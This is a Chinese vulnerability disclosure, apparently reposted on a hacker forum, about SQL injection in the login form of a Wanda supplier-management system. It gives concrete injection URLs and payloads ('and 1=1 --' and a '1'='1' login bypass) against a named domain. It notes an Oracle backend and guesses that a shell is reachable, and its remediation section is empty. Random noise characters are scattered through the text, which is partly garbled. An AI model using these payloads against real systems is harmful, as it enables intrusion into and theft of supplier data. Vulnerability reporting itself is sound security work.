万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
0 O4 |4 ^; n1 G% f8 x8 s详细说明：
万达scm系统登陆框sql注入。
6 T9 O: o" m$ Z7 |, t
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
5 L/ i& Z- l* Q) F2 I

500错误。
1 w9 n" V' e. ~* z8 ]6 r( x
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png

: Y' X) F( T6 c. i. ^4 N# Doracle数据库，存在注入点。@大连万达，你怎么看？
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
' s2 A5 Z6 q7 @& z
, \5 f: _8 u9 O  q" l; ]2 K系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
. `- u9 ^0 a* N% K! X% I漏洞证明：
万达scm系统登陆框sql注入。
# ]9 f/ E7 M$ q
1 B. ]3 R5 V5 t8 }4 Bhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


, B3 E" d) C4 b; ^) v+ s- h( m) h500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
' [& a3 {. N2 [
0 r4 P$ x" X! {; B- j: U
（截图有一点问题）

2 I) ?1 q, n7 n5 Q5 J怎么饶都饶不过去；经过分析，登陆验证的过程应该是：
" g/ M# T5 G4 y5 m
4 |2 c8 S2 [0 @# J* w" a取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。

绕过：
2 m- |4 i! @9 y5 Y! G. Thttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
9 n7 L% e9 O! n
  `) Q# F' K  }8 |( y9 U& e
( y4 k& o2 _8 b* e3 Voracle数据库，存在注入点。@大连万达，你怎么看？
​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

; u9 Q8 G6 s, c6 s3 |/ x修复方案：
* `  c3 R/ E5 M& l) `* W。。。

( X0 j3 D( p4 t! h5 ]: @- c
厂商已经确认

[/td][/tr]
[/table]

0 `$ i4 y1 H' |2 w$ |  a4 [
/ m# q. A# ~- ?7 z# z